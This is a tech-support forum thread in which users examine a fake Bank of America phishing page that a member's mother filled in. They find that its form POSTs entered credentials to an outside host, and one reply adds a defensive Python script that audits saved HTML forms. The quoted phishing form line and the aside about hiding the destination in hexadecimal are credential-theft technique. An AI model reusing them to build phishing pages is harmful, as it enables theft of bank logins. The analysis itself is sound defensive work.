Save text entries into a file with HTML

1823alex

My Mom just got an email from Bank of America saying she had some irregular activity on her account. I figured out it was a fake Bank of America email, but she still entered some info into a fake HTML file named IrregularActivity.html. She didn't enter everything in, but she did try to log in with her credentials etc. So I'm thinking that it possibly saved whatever was entered into the document in a secret file somewhere, but I don't know how to check. I looked through the HTML file and found nothing with C: in it, or any folders at all, but did find some random webpage that has an actual IP as its URL, and it goes to some Hollywood County of North Carolina; I live in Chicago, by the way. So any tips on what I should be looking for to find out if it did save credentials into a file somewhere hidden on the computer, or send them off somewhere? I'll upload the HTML file in a little bit.

Here's the link to it on MediaFire, you can just view it without downloading if you'd like. http://www.mediafire.com/view/62o14o51xtm9i44/IrregularActivityFile.html

Gaming Rig - Excalibur - CPU: i5 6600k @ 4.1GHz, CPU Cooler: Hyper 212 Evo, Mobo: MSI Gaming M3 RAM: 16GB Corsair @2400MHz, GPU: EVGA 1060, Case: NZXT Phantom Full Tower (Red)

My Virtualization Server - Dell R710: 2x X5570s @ 2.93GHz with 32GB DDR3 RAM [Web Server, OSX, Plex, Reverse Proxy]

I love computers, gaming, coding, and photography! Be sure to quote me so I can respond to your post!


I'm not downloading anything, could you paste the file in pastebin?

 

EDIT: Never mind :P 

[CPU: AMD FX-6100 @3.3GHz ] [MoBo: Asrock 970 Extreme4] [GPU: Gigabyte 770 OC ] [RAM: 8GB] [sSD: 64gb for OS] [PSU: 550Watt Be Quiet!] [HDD: 1TB] [CPU cooler: Be Quiet! Shadow Rock Pro Sr1]  -Did i solve your question/problem? Please click 'Marked Solved'-


It sent data to this IP address.

 

199.127.226.180 

 

action="http://myalerts.pw/site/sopp.php" method="POST" onsubmit="return validateForm()" target="myiframe">

 

 

That POST request most likely has any data that you put in the fields.

 

Here's the data center that the VPS this crap is hosted on: http://www.tocici.com/ Report that IP as malicious.

PEWDIEPIE DONT CROSS THAT BRIDGE
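Added example, not part of any post in this thread: one way to answer the original question ("what should I be looking for") is to list every form in the saved HTML file along with where it submits. The sample markup is constructed around the form attributes quoted above; the field names, the `audit_forms` helper and the expected domain `bankofamerica.com` are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the form attributes are the ones quoted in the thread;
# the field names are assumed for illustration.
SAMPLE_HTML = """
<form action="http://myalerts.pw/site/sopp.php" method="POST"
      onsubmit="return validateForm()" target="myiframe">
  <input type="text" name="onlineid"><input type="password" name="passcode">
</form>
"""

class FormAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms, self.current = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action") or "", "target": a.get("target"),
                            "method": (a.get("method") or "GET").upper(), "fields": []}
            self.forms.append(self.current)
        elif tag in ("input", "select", "textarea") and self.current is not None:
            self.current["fields"].append((a.get("name"), (a.get("type") or "text").lower()))
    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def audit_forms(html, expected_domain):
    """Return one finding per form: where it submits and why that is suspicious."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        host = url.hostname or ""  # empty: relative action, submits to the page's own origin
        notes = []
        if host and host != expected_domain and not host.endswith("." + expected_domain):
            notes.append("posts to unexpected host")
        if url.scheme == "http":
            notes.append("sent without TLS")
        if any(ftype == "password" for _, ftype in form["fields"]):
            notes.append("carries a password field")
        findings.append({"host": host, "method": form["method"], "notes": notes})
    return findings

if __name__ == "__main__":
    print(audit_forms(SAMPLE_HTML, "bankofamerica.com"))
```

A form whose action points at a host other than the bank's, over plain HTTP, with a password field, means the entered values left the machine in the POST request rather than being written to a local file.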

 

 


It sent data to this IP address.

 

199.127.226.180 

Which links to this: http://sedoparking.com/en/

Any ideas on what it's doing at all? I tried to enter the letter 'g' into every field and it worked, then it took me to the official, or at least what I think is the official, Bank of America website.

EDIT: Is it trying to send fake traffic to one of those Sedo domain parking things in order to get money, based on what Sedo Parking pays people for?


Which links to this: http://sedoparking.com/en/

Any ideas on what it's doing at all? I tried to enter the letter 'g' into every field and it worked, then it took me to the official, or at least what I think is the official, Bank of America website.

EDIT: Is it trying to send fake traffic to one of those Sedo domain parking things in order to get money, based on what Sedo Parking pays people for?

It's a skid-looking crap phishing page.

 

If he was smart he would put the IP and packet method in hexadecimal.
